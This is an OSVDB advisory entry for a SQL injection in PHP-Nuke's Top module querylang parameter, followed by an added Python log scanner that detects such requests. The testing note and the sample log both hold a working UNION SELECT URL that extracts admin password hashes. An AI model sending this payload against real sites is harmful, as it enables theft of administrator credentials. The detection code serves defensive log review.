PHP-Nuke Top Module querylang Parameter SQL Injection

ID OSVDB:15324
Type osvdb
Reporter OSVDB
Modified 2005-04-06T07:49:20


Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: Change the table prefix from the default "nuke_" to something random such as "zloqf7_".

Manual Testing Notes

http://[victim]/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
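Requests of the shape shown in the testing note can be found in web server access logs. The Python below is an added example, not part of the OSVDB entry or of PHP-Nuke: it parses combined-format log lines and flags Top module requests that carry a querylang value. The log lines are constructed, and treating any client-supplied querylang as worth review is an assumption of the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL syntax that has no place in the Top module's querylang value.
SQL_TOKENS = re.compile(r"\b(?:union|select|from|where)\b|/\*|--|#", re.I)

def classify(target):
    """Return (verdict, decoded querylang) for a request target, or None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/modules.php"):
        return None
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "top" not in [v.lower() for v in params.get("name", [])]:
        return None
    for value in params.get("querylang", []):
        if SQL_TOKENS.search(value):
            return ("sqli", value)
    if "querylang" in params:
        # Assumption: ordinary clients have no reason to send this parameter.
        return ("review", params["querylang"][0])
    return None

def scan(log_lines):
    """Return (line number, client, verdict, decoded value) per flagged line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        result = classify(match.group(1)) if match else None
        if result:
            hits.append((number, line.split()[0], result[0], result[1]))
    return hits

# Constructed sample log (documentation IP ranges), not real traffic.
# The second entry reuses the request from the testing note above.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Apr/2005:07:49:20 +0000] "GET /nuke76/modules.php?name=Top HTTP/1.0" 200 8123',
    '198.51.100.7 - - [06/Apr/2005:07:50:02 +0000] "GET /nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/* HTTP/1.0" 200 9410',
    '192.0.2.44 - - [06/Apr/2005:07:51:30 +0000] "GET /nuke76/modules.php?name=Top&querylang=english HTTP/1.0" 200 8123',
    '192.0.2.10 - - [06/Apr/2005:07:52:11 +0000] "GET /nuke76/modules.php?name=News&file=article&sid=1 HTTP/1.0" 200 5120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the table-prefix workaround leaves the parameter itself untouched, a "sqli" hit is still worth triaging on a site that has applied it.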


Secunia Advisory ID: 14866
CVE-2005-0999